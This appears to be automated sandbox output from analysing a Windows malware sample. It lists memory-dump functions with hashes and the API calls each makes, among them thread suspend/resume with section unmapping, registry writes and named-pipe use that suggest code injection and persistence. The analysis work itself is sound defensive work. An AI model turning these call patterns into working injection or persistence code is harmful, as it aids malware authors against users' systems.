  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
